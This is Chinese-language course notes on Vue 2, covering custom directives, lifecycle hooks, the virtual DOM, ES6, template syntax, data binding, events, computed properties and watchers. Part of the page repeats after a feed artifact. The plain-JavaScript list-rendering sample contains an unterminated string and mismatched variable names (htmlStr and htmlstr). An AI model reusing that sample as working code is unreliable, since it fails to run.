    <h2>当前的 n 值是:<span v-text="n"></span></h2>
    <!-- 需求 1:定义一个 v-big 指令,和 v-text 功能类似,但会把绑定的数值扩大 10 倍。 -->
    <h2>放大 10 倍后的 n 值是:<span v-big="n"></span></h2>
    <button @click="n++">点我 n + 1</button>
    <hr>
<!-- 需求 2:定义一个 v-fbind 指令,和 v-bind 功能类似,但可以让其所绑定的 input 元素默认获取焦点。 -->
    <input type="text" v-fbind:value="n">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    n: 1
    },
    directives: {
    // big 函数何时会被调用?
    // 1. 指令与元素成功绑定时(一上来)bind()
    // 2. 指令所在的模板被重新解析时 update()
    big(element, binding) {
    element.innerText = binding.value * 10
    console.log(element, binding)
    },
    fbind: {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element, binding) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    }
    }
    })
    </script>

    047 自定义指令-总结

    自定义指令总结:

    1. 定义语法
• 局部指令:
  • new Vue({directives: {指令名: 配置对象}})
  • new Vue({directives: {指令名: 回调函数}})
• 全局指令(写法示例见本列表之后):
  • Vue.directive(指令名, 配置对象)
  • Vue.directive(指令名, 回调函数)
    2. 配置对象中常用的 3 个回调:
      • bind:指令与元素成功绑定时调用。
      • inserted:指令所在元素被插入页面时调用。
      • update:指令所在模板结构被重新解析时调用。
    3. 备注:
      • 指令定义时不加 v-,但使用时要加 v-
      • 指令名如果是多个单词,要使用 kebab-case 命名方式,不要用 camelCase 命名。
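
For reference, the global form of the earlier fbind directive could be written like this (a sketch following the Vue 2 API; it must run before the Vue instances that use it are created):

// global directive: available in every subsequent Vue instance / component
Vue.directive('fbind', {
bind(element, binding) { element.value = binding.value },
inserted(element) { element.focus() },
update(element, binding) { element.value = binding.value }
})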

    十七、生命周期

    049 生命周期-挂载流程

    生命周期:

    1. 又名:生命周期回调函数、生命周期函数、生命周期钩子。
    2. 是什么:Vue 在关键时刻帮我们调用的一些特殊名称的函数。
    3. 生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
    4. 生命周期函数中的 this 指向是 vm 或组件实例对象。
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    })
    </script>

    050 生命周期-更新流程 & 051 生命周期-销毁流程

    ​Vue 组件的生命周期大致可以分为三个阶段:创建阶段更新阶段销毁阶段。每个阶段都有一系列的生命周期钩子函数,可以让开发者在这些阶段执行特定的逻辑。

    webp

    052 总结生命周期

    张三的一生(张三的生命周期):

    • 将要出生
    • (重要)呱呱坠地 → 检查身体各项指标。
    • 学会说话
    • 学会走路
    • ……
    • ……
    • (重要)将要永别 → 交代后事
    • 已经永别

    vm 的一生(vm 的生命周期):

• 将要创建 → 调用 beforeCreate()
    • 创建完毕 → 调用 created()
    • 将要挂载 → 调用 beforeMount()
    • (重要)挂载完毕 → 调用 mounted()
    • 将要更新 → 调用 beforeUpdate()
    • 更新完毕 → 调用 updated()
    • (重要)将要销毁 → 调用 beforeDestroy()
    • 销毁完毕 → 调用 destroyed()

    常用的生命周期钩子:

    1. mounted():发送 ajax 请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】。
    2. beforeDestroy():清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】。

    关于销毁 Vue 实例

    1. 销毁后借助 Vue 开发者工具看不到任何信息。
    2. 销毁后自定义事件会失效,但原生 DOM 事件依然有效。
3. 一般不会在 beforeDestroy() 中操作数据,因为即便操作数据,也不会再触发更新流程了。
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    <button @click="stop">点我停止变换</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    methods: {
    stop() {
    this.$destroy()
    }
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    this.timer = setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    beforeDestroy() {
    clearInterval(this.timer) // 销毁 Vue 实例并不会销毁定时器
    },
    })
    </script>
    ]]>
    + 资源

    目录

    1. Vue 核心
    2. Vue 组件化编程
    3. 使用 Vue 脚手架
    4. Vue 中的 ajax
    5. vuex
    6. vue-router
    7. Vue UI 组件库

    正文

    一、初识 Vue

    001 课程简介

    Vue2(4 年、70+ 更新)→Vue3(未来趋势)

    Vue:

    • vue 基础
    • vue-cli
    • vue-router
    • vuex
    • element-ui
    • vue3

    002 Vue 简介

    Vue 是什么?

    一套用于构建用户界面渐进式 Javascript 框架。

    构建用户界面:将后端的数据转换为界面(DOM)显示

    **渐进式:**Vue 可以自底向上逐层的应用

    • 简单应用:只需一个轻量小巧的核心库
    • 复杂应用:可以引入各式各样的 Vue 插件

    谁开发的?

    ​尤雨溪:yyx990803 (Evan You)

    年份描述
    2013 年受到 Angular 框架的启发,尤雨溪开发出了一款轻量框架 - Seed。
    同年 12 月,Seed 更名为 Vue,版本号 0.6.0。
    2014 年Vue 正式对外发布,版本号0.8.0
    Taylor otwel 在 Twitter 上发表动态,说自己正在学习 Vue.js
    2015 年10 月 27 日,正式发布 Vue 1.0.0 Evangelion(新世纪福音战士)
    2016 年10 月 1 日,正式发布 Vue 2.0.0 Ghostin the Shell(攻壳机动队)
    2020 年9 月 18 日,正式发布 Vue 3.0.0 One Piece(海贼王)

    ​后起之秀,生态完善,已然成为国内前端工程师必备技能。

    Vue 的特点

    • 采用组件化模式,提高代码复用率、且让代码更好维护。

    webp

    ​像网页中的各个组件的 DOM,用对应的 vue 文件来表示,vue 中集成了 Html、CSS、JS 中的内容。各个组件不会互相影响。

    数据(persons)

    1
    2
    3
    4
    5
    [
    {id: '001',name: '张三',age: 18},
    {id:'002',name:'李四',age:19},
    {id:'003',name:'王五',age:20}
    ]

    容器(DOM)

    1
    <ul id="list"></ul>

    效果

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20
    • 声明式编码,让编码人员无需直接操作 DOM,提高开发效率。

    命令式编码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 准备 html 字符串
    let htmlStr ='
    // 遍历数据拼接 htm1 字符串
    persons.forEach(p=>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });
    // 获取 list 元素
    let list = document.getElementById('list')
    // 修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr

    声明式编码

    1
    2
    3
    4
    5
    <ul id="list">
    <li v-for="p in persons">
    {{p.id}}-{{p.name}}-{{p.age}}
    </li>
    </ul>
    • 使用虚拟 DOM+优秀的 Diff 算法,尽量复用 DOM 节点。

    原生 Javascript 实现将数据转换为视图:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <!-- 展示人员列表的容器 -->
    <ul id="list"></ul>

    <script type="text/javascript">
    // 一些人的数据
    let persons = [
    {id:'001', name:'张三', age:18},
    {id:'002', name:'李四', age:19},
    {id:'03', name:'王五', age:20}
    ]

    // 准备 html 字符串
    let htmlStr = ''

    // 遍历数据拼接 html 字符串
    persons.forEach(p =>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });

    //获取 list 元素
    let list = document.getElementById('list')

    //修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr
    </script>

Which yields:

• 001 - 张三 - 18
• 002 - 李四 - 19
• 003 - 王五 - 20

Plain JavaScript writes data straight into the real DOM; whenever the data changes, the whole DOM must be re-rendered.

Vue instead introduces a virtual DOM.

In Vue, "diff" is the algorithm that, on each update, compares the new and old virtual DOM trees, computes the minimal set of differences, and applies only those differences to the real DOM.

1. What the virtual DOM is

The virtual DOM is a performance technique: Vue keeps an in-memory tree mirroring the real DOM structure, and when data changes it only diffs the new virtual tree against the old one and applies the minimal changes to the real DOM, rather than re-rendering everything.

2. How the diff algorithm works

When a component's state or data changes, Vue generates a new virtual DOM and compares it with the old one. That comparison is the heart of the diff algorithm, whose goal is to find the differences between the two trees efficiently and to minimize the cost of DOM updates.

The diff proceeds through a few key steps:

• Node type comparison: Vue first checks whether the old and new nodes have the same type. If so, it goes on to compare their children; if not, it replaces the node outright.
• Attribute comparison: for nodes of the same type, Vue compares their attributes (such as class and style) one by one and updates only the ones that changed.
• Child comparison: Vue compares children with optimizations; under the same parent it walks the old and new child lists from both ends with pairs of pointers, finding differences without needless traversal.
• Keys: Vue recommends giving each item in a rendered list a key, which lets it locate elements efficiently and avoid unnecessary reflows and repaints.

3. Optimizations in the diff algorithm

Vue's diff is optimized mainly in these ways:

• Minimized comparison scope: within the same level of the tree, children are compared with the two-pointer scheme rather than fully re-traversed.
• Skipping unnecessary updates: if the old and new nodes are identical, the node is skipped.
• Targeted updates: only the nodes that changed are updated, rather than re-rendering the whole tree.

4. Why a diff algorithm is needed

DOM manipulation is expensive, especially when data changes frequently. With the virtual DOM and the diff algorithm, Vue avoids a great deal of unnecessary DOM work and thereby improves performance. A minimal sketch of the idea is shown below.

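A minimal sketch of type/key-based diffing in plain JavaScript (illustrative only, far simpler than Vue's real patch function; the vnode shape {tag, key, text} is an assumption for this example):

// Two vnodes are "the same node" when tag and key match; then we patch in place.
function sameVnode(a, b) {
  return a.tag === b.tag && a.key === b.key
}

function createElement(vnode) {
  const el = document.createElement(vnode.tag)
  el.textContent = vnode.text || ''
  return el
}

function patch(el, oldVnode, newVnode) {
  if (!sameVnode(oldVnode, newVnode)) {
    el.replaceWith(createElement(newVnode)) // different node: replace wholesale
    return
  }
  if (oldVnode.text !== newVnode.text) {
    el.textContent = newVnode.text // same node: update only what changed
  }
}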
What JavaScript fundamentals should you know before learning Vue?

ES6 syntax

ES6 (ECMAScript 2015) was a major update to JavaScript that introduced many new syntax features for writing cleaner, more concise code. Highlights:

• let and const: let declares a mutable variable; const declares a constant.
• Arrow functions: shorter function syntax, and this is bound lexically rather than dynamically.
const add = (a, b) => a + b;
• Template literals: interpolate variables with ${}, making string composition more readable.
let name = "Vue";
console.log(`Welcome to ${name}`);
• Destructuring: quickly pull values out of arrays or objects into variables.
const [a, b] = [1, 2]; // destructure an array
const { name, age } = { name: "Alice", age: 25 }; // destructure an object
• Default parameters: function parameters can have default values.
function greet(name = "Guest") {
console.log(`Hello, ${name}!`);
}
• Spread/rest operator: simplifies working with arrays and objects.
let arr = [1, 2, 3];
let newArr = [...arr, 4, 5]; // spread an array

const obj = { a: 1, b: 2 };
const newObj = { ...obj, c: 3 }; // spread an object
ES6 modules

ES6 introduced a module system: import and export make code easier to maintain and reuse. The essentials:

• Exporting: a module exposes variables, functions, or classes with export.
// person.js
export const name = 'Alice';
export function greet() {
console.log("Hello!");
}
• Importing: other modules pull in the exports with import.
// app.js
import { name, greet } from './person.js';
greet();
console.log(name);
Package managers

In modern JavaScript development, package managers (such as npm and yarn) install, update, and remove a project's dependencies.

• npm (Node Package Manager): the default package manager for Node.js; it downloads and manages third-party libraries and tools.
npm init -y      # initialize a new package.json
npm install vue  # install the Vue.js library
npm install      # install all of the project's dependencies
• yarn: a package manager from Facebook, with some performance and concurrency improvements over npm.
yarn init        # initialize a project
yarn add vue     # install the Vue.js library
yarn install     # install the project's dependencies
Prototypes and the prototype chain

JavaScript is a prototype-based language. Every function has a prototype property pointing to its prototype object, and objects are linked through their prototypes into a chain; inheritance works through this prototype chain.

• Prototype: every function has a prototype property that defines the shared properties and methods of the objects that function creates.
function Person(name) {
this.name = name;
}

Person.prototype.sayHello = function() {
console.log("Hello, " + this.name);
};

const person = new Person('John');
person.sayHello(); // Hello, John
• Prototype chain: an object can reach its prototype through __proto__, which is how inherited lookups happen.
const obj = { name: 'Vue' };
console.log(obj.__proto__); // the prototype object of obj
Common array methods

JavaScript's array methods come up constantly in day-to-day development. Some of the most common:

• map(): returns a new array in which every element has been transformed by the callback.
const arr = [1, 2, 3];
const result = arr.map(x => x * 2); // [2, 4, 6]
• filter(): returns a new array containing only the elements that pass the test.
const arr = [1, 2, 3, 4];
const result = arr.filter(x => x > 2); // [3, 4]
• reduce(): folds the array down to a single value via the callback.
const arr = [1, 2, 3];
const sum = arr.reduce((acc, curr) => acc + curr, 0); // 6
• forEach(): runs a callback for every element and returns nothing.
const arr = [1, 2, 3];
arr.forEach(x => console.log(x)); // logs 1, 2, 3
Axios

Axios is a Promise-based HTTP client for the browser and Node.js, commonly used to call back-end APIs.

• Sending a GET request
axios.get('https://api.example.com/data')
.then(response => {
console.log(response.data);
})
.catch(error => {
console.error(error);
});
• Sending a POST request
axios.post('https://api.example.com/data', { name: 'Vue' })
.then(response => {
console.log(response.data);
})
.catch(error => {
console.error(error);
});
Promise

A Promise is the JavaScript object for handling asynchronous operations. It has three states: pending, fulfilled (often loosely called resolved), and rejected.

• Creating a Promise
const promise = new Promise((resolve, reject) => {
let success = true;
if (success) {
resolve('Success!');
} else {
reject('Failed!');
}
});
• Using .then() and .catch()
promise
.then(result => console.log(result)) // Success!
.catch(error => console.log(error)); // Failed!
• Chaining
new Promise((resolve, reject) => {
resolve(1);
})
.then(value => value + 2)
.then(value => value * 3)
.then(value => console.log(value)); // 9

003 Navigating the Vue Docs

004 Setting Up a Vue Development Environment

Download Vue 2 from the Installation page of the Vue.js site. You get two files: vue.js (the development build, with full warnings and debug mode) and vue.min.js (for production, with all warnings stripped and a smaller footprint).

Add the downloaded file to your project and organize the project files accordingly.

In an empty HTML file in VS Code, type ! and press Tab to generate a boilerplate template, then edit it:

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    </script>
    </body>
    </html>

Install Vue DevTools for easier debugging: Vue.js devtools - Microsoft Edge Addons

The Vue development environment is now ready.

005-006 A Hello Example & Analysis

In VS Code, typing div#root expands to <div id="root"></div>.


Getting to know Vue:

1. To make Vue do anything, you must create a Vue instance and pass it a configuration object;

2. The code inside the root container is still valid HTML, just mixed with some special Vue syntax;

3. The code inside the root container is called the Vue template;

4. Vue instances and containers correspond one to one;

5. In real projects there is exactly one Vue instance, used together with components;

6. Whatever goes inside {{}} must be a JS expression, and it can read any property in data directly;

  Note the difference between a JS expression and a JS statement:

  • An expression produces a value and can appear anywhere a value is expected:
    • a
    • a + b
    • demo(1)
    • x === y ? 'a' : 'b'
  • JS statements:
    • if(){}
    • for(){}
7. Whenever the data in data changes, every place in the template that uses it updates automatically.

    <div id="root">
    <h1>Hello, {{name.toUpperCase()}}</h1>
    <h1>I'm {{age}} years old.</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: "#root", // el 用于指定当前 Vue 实例为哪个容器服务,值通常为 css 选择器字符串(类/id)。
    data: {
    name: 'Gul’dan',
    age: '18'
    }
    })
    </script>

II. Vue Template Syntax

007 Template Syntax

Vue template syntax comes in two flavors:

1. Interpolation
  • Purpose: renders content inside an element's body.
  • Syntax: {{xxx}}, where xxx is a JS expression that can read any property in data directly.
2. Directives
  • Purpose: configures elements (attributes, body content, event bindings, and so on).
  • Example: v-bind:href="xxx", or the shorthand :href="xxx"; xxx is again a JS expression that can read any property in data directly.
  • Note: Vue has many directives, all of the form v-????; v-bind is just the example here.
    <div id="root">
    <h1>Hello, {{player.name}}</h1>
<a :href="url">点击打开百度!</a>
<a v-bind:href="url">点击打开百度!</a>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    player:{
    name: 'Gul’dan'
    },
    url: 'http://www.baidu.com'
    }
    })
    </script>

III. Data Binding

008 Data Binding

Vue has two kinds of data binding:

1. One-way binding, v-bind: data flows only from data to the page.

2. Two-way binding, v-model: data flows from data to the page and from the page back into data.

  Notes:

  • Two-way binding is generally used on **form (input-type) elements** such as input and select.
  • v-model:value can be shortened to v-model, because v-model collects value by default.
    <div id="root">
    单向数据绑定:<input type="text" :value="name"><br/>
    双向数据绑定:<input type="text" v-model:value="name"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    name: '123456'
    }
    })
    </script>

Editing the top input does not change the data on the Vue instance;

editing the bottom input does change it, which in turn updates the top input.

IV. Two Ways to Write el and data

009 Two Ways to Write el and data

1. Two ways to set el:

  • Configure the el option when calling new Vue.

  • Create the Vue instance first, then mount it later with vm.$mount('#root').

2. Two ways to write data:

  • Object form
  • Function form

  Which to choose: for now either works, but once you get to components, data must be a function, or Vue raises an error.

  One important rule: never use arrow functions for functions managed by Vue; with an arrow function, this is no longer the Vue instance (it becomes window).

    <div id="root">
    <h1>你好,{{name}}</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    data() {
    return {name: '古尔丹'}
    }
    })

    setTimeout(() => {
    v.$mount('#root')
    }, 1000)
    </script>

V. The MVVM Pattern

010 Understanding MVVM

In software development, MVVM (Model-View-ViewModel) is an architecture pattern widely used on the front end, especially for data-driven user interfaces (WPF, Xamarin, and front-end frameworks such as Vue and Angular). By separating UI logic from business logic, it simplifies state management and data binding. MVVM has three main parts:

1. Model
  The data layer: business logic and data structures. It fetches data from sources such as databases or APIs and handles the related business logic.
2. View
  The UI layer: it displays data and receives user interaction, usually consisting of layout and styling files such as HTML or XAML. Its job is presentation, not logic.
3. ViewModel
  The bridge between View and Model. It holds the data and state the UI needs, listens for user input to update the Model, and transforms the Model's data into a form the View can consume. View and ViewModel usually communicate through data binding.

Key characteristics of MVVM

• Two-way data binding
  The View binds to the ViewModel's properties: when a ViewModel property changes, the View updates automatically, and user input in the View updates the ViewModel. This largely removes the need to update the UI by hand.
• Commands
  The ViewModel exposes commands that the View binds to for handling user actions (such as button clicks). Through commands, the ViewModel talks to the business logic without the View handling events directly.
• Testability
  Because the ViewModel is decoupled from the UI, its logic can be unit-tested without rendering anything.

In Vue's terms:

1. M, the Model: the data in data
2. V, the View: the template
3. VM, the ViewModel: the Vue instance

Two observations:

1. Every property in data ends up on vm.
2. Every property on vm, and every property on Vue's prototype, can be used directly in the Vue template.

VI. Data Proxying

011 Object.defineProperty

Object.defineProperty is a JavaScript method that gives precise control over how an object's properties behave. Unlike plain assignment, it lets you attach a "property descriptor" when defining or modifying a property, governing enumerability, configurability, and writability. The basic syntax:

Object.defineProperty(obj, prop, descriptor)
• Parameters
  • obj: the object on which to define the property.
  • prop: the name of the property to define or modify (a string).
  • descriptor: an object describing the property's behavior.
• Property descriptors
  1. Data descriptors hold a value plus flags that control behavior. Common fields:
    • value: the property's value (default undefined).
    • writable: boolean; whether the property can be changed with the assignment operator (default false).
    • enumerable: boolean; whether the property is enumerable, i.e. visible to for...in and Object.keys (default false).
    • configurable: boolean; whether the descriptor can be changed further or the property deleted (default false).
  2. Accessor descriptors define getter and setter functions.
    • get: a function serving as the property's getter, called when the value is read. Default undefined.
    • set: a function serving as the property's setter, called when the value is written. Default undefined.
    • enumerable and configurable: as in data descriptors.

Test it in the console:

    let number = 18
    let person = {
    name: '张三',
    sex: '男',
    }

    Object.defineProperty(person, 'age', {
    // value: 18,
    // enumerable: true, // 控制属性是否可以枚举,默认值是 false
    // writable: true, //控制属性是否可以被修改,默认值是 false
    // configurable: true, //控制属性是否可以被删除,默认值是false

    // 当有人读取 person 的 age 属性时,get 函数 (getter) 就会被调用,且返回值就是 age 的值
    get() {
    console.log('有人读取 age 属性了')
    return number
    },

    // 当有人修改 person 的 age 属性时,set 函数 (setter) 就会被调用,且会收到修改的具体值
    set(value) {
    console.log('有人修改了 age 属性,且值是', value)
    number = value
    }
    })


012 Understanding Data Proxying

Data proxying: using one object to proxy reads and writes of properties on another object.

    let obj = {x:100}
    let obj2 = {y:200}

    Object.defineProperty(obj2, 'x', {
    get() {
    return obj.x
    },
    set(value) {
    obj.x = value
    }
    })

Now, changing obj2.x also changes obj.x.

013 Data Proxying in Vue

Vue uses this data-proxying technique to make code more convenient to write.

Reading or writing vm.name is equivalent to reading or writing vm._data.name, as sketched below.

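A minimal sketch of how such a proxy can be built with Object.defineProperty (illustrative only, not Vue's actual source): for each key in _data, define a same-named accessor on the instance that forwards to _data.

const vm = { _data: { name: '张三' } }

Object.keys(vm._data).forEach(key => {
  Object.defineProperty(vm, key, {
    get() { return vm._data[key] },      // reading vm.name reads vm._data.name
    set(value) { vm._data[key] = value } // writing vm.name writes vm._data.name
  })
})

vm.name = '李四'
console.log(vm._data.name) // '李四'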
VII. Event Handling

014 Event Handling

Basic event usage:

1. Bind events with v-on:xxx or @xxx, where xxx is the event name;
2. Event callbacks are configured in the methods object and end up on vm;
3. Do not use arrow functions in methods, or this will no longer be vm;
4. Functions in methods are managed by Vue, so this points to vm or the component instance;
5. @click="demo" and @click="demo($event)" behave the same, but the latter can pass extra arguments;


    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- <button v-on:click="showInfo">点我提示信息</button> -->
    <button @click="showInfo1">点我提示信息 1(不传参)</button>
    <!-- 如果不需要获取点击事件,则不需要参数 $event -->
    <button @click="showInfo2($event, 66)">点我提示信息 2(传参)</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo1(event) {
    alert('你好啊朋友!')
    },
    showInfo2(event, number) {
    console.log(event, number)
    alert('圣光会制裁你!')
    }
    }
    })
    </script>

015 Event Modifiers & 017 Events Summary

Vue's event modifiers:

1. prevent: prevent the default action (common);
2. stop: stop event bubbling (common);
3. once: fire the handler only once (common);
4. capture: handle the event in the capture phase;
5. self: fire only when event.target is the element the handler is bound to;
6. passive: let the event's default behavior run immediately instead of waiting for the handler to finish.

In JavaScript, event capturing and event bubbling are the two phases of event propagation, describing the order in which an event passes from element to element in the DOM.

Event propagation goes through three phases:

• Capture phase: the event travels down from the topmost ancestor (usually window) to the target element.
• Target phase: the event reaches the element that triggered it.
• Bubble phase: the event travels from the target back up through its ancestors to window.
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    <style>
    * {
    margin-top: 20px;
    }
    .demo1 {
    height: 50px;
    background-color: skyblue;
    }
    .box1 {
    padding: 5px;
    background-color: skyblue;
    }
    .box2 {
    padding: 5px;
    background-color: orange;
    }
    .list {
    width: 200px;
    height: 20px;
    background-color: peru;
    overflow: auto;
    }
    li {
    height: 100px;
    }
    </style>
    </head>
    <body>
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- 阻止默认事件(常用) -->
    <a href="https://www.baidu.com" @click.prevent="showInfo">点我提示信息</a>
    <!-- 阻止事件冒泡(常用) -->
    <div class="demo1" @click="showInfo">
    <button @click.stop="showInfo">点我提示信息</button>
    </div>
    <!-- 事件只触发一次(常用) -->
    <button @click.once="showInfo">点我提示信息</button>
    <!-- 使用事件的捕获模式 -->
    <div class="box1" @click.capture="showMsg(1)">
    div1
    <div class="box2" @click="showMsg(2)">
    div2
    </div>
    </div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    alert('你好啊朋友!')
    },
    showMsg(msg) {
    alert(msg)
    }
    }
    })
    </script>
    </body>
    </html>

Modifiers can be chained: @click.stop.prevent first stops the bubbling, then prevents the default action.

016 Keyboard Events & 017 Events Summary

1. Vue's common key aliases:

  • Enter => enter

  • Delete => delete (captures both Delete and Backspace)

  • Escape => esc

  • Space => space

  • Tab => tab

  • Up => up

  • Down => down

  • Left => left

  • Right => right

2. For keys Vue has no alias for, bind with the key's raw key value, converted to kebab-case:

  • CapsLock becomes caps-lock
3. System modifier keys (special usage): ctrl, alt, shift, meta

  • With keyup: hold the modifier, press another key, and release that other key; only then does the event fire

    • @keyup.ctrl.y fires only after pressing and releasing Ctrl + y.
  • With keydown: the event fires normally.

4. You can also bind by keyCode (not recommended)

5. Vue.config.keyCodes.customKeyName = keyCode defines a custom key alias

    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    console.log(e.target.value);
    }
    }
    })
    </script>

This code calls showInfo() when the Enter key is released, logging the input's current value. A sketch of a custom key alias (item 5 above) follows.

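A minimal sketch of item 5 above, defining a custom key alias (the name huiche is arbitrary):

Vue.config.keyCodes.huiche = 13 // register "huiche" as an alias for keyCode 13, i.e. Enter
// then in the template: <input type="text" @keyup.huiche="showInfo">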
VIII. Computed Properties

018 The Full-Name Example

First, with plain interpolation:

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<span>{{firstName}}-{{lastName}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    }
    })
    </script>

And the same with a methods-based implementation:

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<span>{{fullName()}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    methods: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

019 Computed Properties

Computed properties:

1. Definition: a property that does not exist in data but is derived from existing properties.
2. Under the hood they rely on the getter and setter provided by Object.defineProperty.
3. When does get() run?
  • Once, on first read.
  • Again whenever the data it depends on changes.
4. Advantage over a methods implementation: computed properties are cached and reused, so they are more efficient and easier to debug.
5. Notes:
  • Computed properties end up on vm; read them directly.
  • To make a computed property writable, supply a set() that responds to the write, and that set() must change the data the computation depends on.

Computed properties are declared with the computed option.

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<input type="text" v-model="fullName"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName: {
    // get() 有什么作用?当有人读取 fullName 时,get() 就会被调用,且返回值就作为 fullName 值;
    // get() 什么时候调用?
    // 1. 初次读取 fullName 时;
    // 2. 所依赖的数据发生变化时。
    get() {
    return this.firstName + '-' + this.lastName
    },
    set(value) {
    const arr = value.split('-')
    this.firstName = arr[0]
    this.lastName = arr[1]
    }
    }
    }
    })
    </script>

020 Computed Properties: Shorthand

When only a getter is needed, fullName: {get(){}} can be shortened to fullName(){}.

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

IX. Watchers

021 The Weather Example

    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })
    </script>

022 Watchers

watch observes properties for changes.


The watch option:

1. When the watched property changes, its callback runs automatically to do whatever work is needed.
2. The property must exist before it can be watched!
3. Two ways to set up a watcher:
  • Pass a watch option to new Vue
  • Call v.$watch
